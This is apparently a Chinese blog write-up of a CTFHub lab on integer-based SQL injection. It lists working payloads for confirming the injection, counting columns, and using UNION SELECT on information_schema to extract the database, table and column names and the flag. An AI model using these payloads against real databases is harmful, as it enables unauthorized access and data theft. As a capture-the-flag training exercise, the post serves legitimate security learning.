CTFHUB技能树之SQL——整数型注入

CTFHUB技能树之SQL——整数型注入

embedded/2024/10/20 11:13:10/

开启靶场，打开链接：

直接指明是SQL整数型注入，但还是来判断一下

（1）检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入

（2）猜字段数

1 order by 2#

1 order by 3#

说明字段数是2

（3）爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag：

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的，但我提前交了就不想再费时间重开一遍靶场了，待会就在“字符型注入”中试试了

http://www.ppmy.cn/embedded/128978.html

相关文章

《深度学习》Dlib库人脸应用实例疲劳监测

《深度学习》Dlib库人脸应用实例疲劳监测

目录一、了解项目 1、脸部关键点 2、实现方法 3、流程初始化阶段： 视频处理循环： 显示与交互： 二、案例实现 1、完整代码 2、运行结果一、了解项目 1、脸部关键点 2、实现方法通过眼睛的纵横比来判断眼睛是否闭合。从而判断人…

阅读更多...

RabbitMQ service is already present - only updating service parameters

RabbitMQ service is already present - only updating service parameters

Windows下卸载RabbitMQ之后，然后重新注册RabbitMQ服务的时候，报错以下信息： D:\software\rabbitmq-server-4.0.2\rabbitmq_server-4.0.2\sbin>D:\software\rabbitmq-server-4.0.2\rabbitmq_server-4.0.2\sbin\rabbitmq-service.bat install RabbitMQ service is already …

阅读更多...

【C51】单片机与LED数码管的静态显示接口案例分析

【C51】单片机与LED数码管的静态显示接口案例分析

目录 ---案例需求--- 1、电路设计 2、程序 3、元器件清单 4、程序仿真 LED数码管有静态显示和动态显示两种显示方式。静态显示是指无论有多少位LE数码管，其都同处于显示状态。数码管工作于静态显示方式时，各位的共阴极（或共阳极&#xf…

阅读更多...

基于SpringBoot+Vue+uniapp的在线招聘平台的详细设计和实现

基于SpringBoot+Vue+uniapp的在线招聘平台的详细设计和实现

详细视频演示请联系我获取更详细的演示视频项目运行截图技术框架后端采用SpringBoot框架 Spring Boot 是一个用于快速开发基于 Spring 框架的应用程序的开源框架。它采用约定大于配置的理念，提供了一套默认的配置，让开发者可以更专注于业务逻辑而不…

阅读更多...

package.json 里的 dependencies和devDependencies区别

package.json 里的 dependencies和devDependencies区别

dependencies（依赖的意思）： 通过 --save 安装，是需要发布到生产环境的。比如项目中使用react，那么没有这个包的依赖就会报错，因此把依赖写入dependencies npm install <package-name>// 缩写 np…

阅读更多...

【Unity】【游戏开发】游戏引擎是如何模拟世界的

【Unity】【游戏开发】游戏引擎是如何模拟世界的

【核心感悟】游戏引擎通过两个维度的合并来模拟这个时间。一个维度叫物理模型。一个维度叫视觉模型。对于物理模型，我们需要用物理引擎给予行为。对于视觉模型，我们需要用动画去给予行为。物理模型是真实机制，视觉模型是艺术表现&…

阅读更多...

OpenCV高级图形用户界面(20)更改窗口的标题函数setWindowTitle()的使用

OpenCV高级图形用户界面(20)更改窗口的标题函数setWindowTitle()的使用

操作系统：ubuntu22.04 OpenCV版本：OpenCV4.9 IDE:Visual Studio Code 编程语言：C11 算法描述在OpenCV中，cv::setWindowTitle函数用于更改窗口的标题。这使得您可以在程序运行时动态地更改窗口的标题文本。函数原型 void cv::…

阅读更多...

nginx的负载均衡配置和重定向

nginx的负载均衡配置和重定向

upstream_check模块配置文件详情 upstream cluster1{server 10.0.0.4:80 weight1 max_fails3 fail_timeout30s;server 10.0.0.5:80 weight1 max_fsils3 fsil_tomeout;check interval3000 rise2 fall5 timeout1000 typehttp;check interval3000 rise2 fall5 timeout1000…

阅读更多...

最新文章